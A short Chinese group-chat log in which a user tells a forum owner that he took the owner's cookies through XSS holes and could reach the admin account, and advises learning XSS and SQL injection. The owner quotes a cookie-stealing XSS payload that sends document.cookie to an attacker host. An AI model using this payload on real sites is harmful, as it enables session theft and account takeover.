向群主学习(2865955610)  17:03:04

　　@小同 你的网站安全漏洞太多了

　　发你的私信看了吗？

　　@小同  我是说论坛私信

　　Flying  17:05:20

　　你本地cookie都被我拿走了

　　管理员账户我都拿得到

　　...

　　小同  17:05:53

　　怎么做到的啊

　　是这个么：location.replace("http://www.attackpage.com/record.asp?secret="+document.cookie)

　　我是管理员我都不会拿cookie

　　是那个论坛程序有漏洞么

　　不是我自己做的那个网页的问题吧

　　...

　　Flying  17:08:44

　　你去了解一下xss吧

　　...

　　小同  17:08:58

　　要学的东西太多了

　　...

　　我和作者说一下

　　碰到你这样的高手，也没办法了

　　毕竟象你这样的应该不多

　　...

　　Flying  17:13:36

　　别和作者说啊

　　万一作者找我了

　　...

　　Flying  17:13:47

　　我是说你代码可能有漏洞

　　...

　　小同  17:13:57

　　不会不会，他会感谢你呢

　　...

　　Flying  17:14:02

　　多学习一下xss，sql inject方面知识

　　...

　　小同  17:14:11

　　好的好的